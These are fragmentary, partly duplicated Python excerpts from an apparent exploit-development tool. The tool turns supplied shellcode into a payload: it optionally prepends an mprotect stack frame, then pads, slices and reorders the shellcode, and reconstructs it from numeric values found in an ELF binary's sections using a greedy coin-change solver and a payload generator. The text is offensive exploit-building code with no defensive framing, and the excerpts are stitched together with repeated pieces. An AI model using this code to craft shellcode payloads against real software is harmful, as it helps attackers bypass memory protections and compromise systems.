if prepend_mprotect: bin_shellcode = "%s%s" % (build_mprotect_stack(stack_frame, stack_frame + 0x10), hex_str_repr_2_str(shellcode)) else: bin_shellcode = hex_str_repr_2_str(shellcode) try: f = open(binary, "rb") except Exception as ex: print("Can't open file %s: %s" % (argv[1], ex), file=stderr) exit(1) if bin_shellcode is not None: slices = slice_shellcode(switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00"))) print(slices) slice_gaps = get_slice_gaps(slices) candidates = get_numbers(f, section_names, 0xffffffff, use_segment=use_segment, no_null_bytes=True) #candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True) f.close() coins = list(set(candidates.values())) pg = PayloadGenerator() if prologue: python_code += pg.add_prologue() first = True for gap in slice_gaps: # Not elegant, but for first element, remove the initial value of accumulator register if first: first_gap = list(gap) accumulator_value += first_gap[1] - 1 first_gap[1] = abs(cmp2(first_gap[1] - initial_reg_value))
if (section_names is None) and (not use_segment): section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash", ".dynsym", ".dynstr", ".gnu.version", ".gnu.version_r", ".rel.dyn", ".rel.plt", ".init", ".plt", ".text", ".fini", ".rodata", ".eh_frame", ".comment") elif (section_names is None) and use_segment: section_names = (".text", ".data") try: f = open(args.filename, "rb") except Exception as ex: print("Can't open file %s: %s" % (argv[1], ex), file=stderr) exit(1) candidates = get_numbers(f, section_names, change, exclude, use_segment, no_null_bytes) f.close() if candidates != None: unique_values = set(candidates.values()) #oper, results = solve_dp(list(unique_values), change) oper, results = solve_gready(list(unique_values), change) if oper != 0: print("Found a solution using %u operations: %s" % (oper, results)) else: print("No solution was found. Exiting...", file=stderr) exit(2) else: print("Found no candidate numbers in elf file. Exiting...",
bin_shellcode = hex_str_repr_2_str(shellcode) try: f = open(binary, "rb") except Exception as ex: print("Can't open file %s: %s" % (argv[1], ex), file=stderr) exit(1) if bin_shellcode is not None: slices = slice_shellcode( switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00"))) print(slices) slice_gaps = get_slice_gaps(slices) candidates = get_numbers(f, section_names, 0xffffffff, use_segment=use_segment, no_null_bytes=True) #candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True) f.close() coins = list(set(candidates.values())) pg = PayloadGenerator() if prologue: python_code += pg.add_prologue() first = True for gap in slice_gaps: # Not elegant, but for first element, remove the initial value of accumulator register if first: first_gap = list(gap)
exclude.append(0) else: exclude = [0] if (section_names is None) and (not use_segment): section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash", ".dynsym", ".dynstr", ".gnu.version", ".gnu.version_r", ".rel.dyn", ".rel.plt", ".init", ".plt", ".text", ".fini", ".rodata", ".eh_frame", ".comment") elif (section_names is None) and use_segment: section_names = (".text", ".data") try: f = open(args.filename, "rb") except Exception as ex: print("Can't open file %s: %s" % (argv[1], ex), file=stderr) exit(1) candidates = get_numbers(f, section_names, change, exclude, use_segment, no_null_bytes) f.close() if candidates != None: unique_values = set(candidates.values()) #oper, results = solve_dp(list(unique_values), change) oper, results = solve_gready(list(unique_values), change) if oper != 0: print("Found a solution using %u operations: %s" % (oper, results)) else: print("No solution was found. Exiting...", file=stderr) exit(2) else: print("Found no candidate numbers in elf file. Exiting...", file=stderr)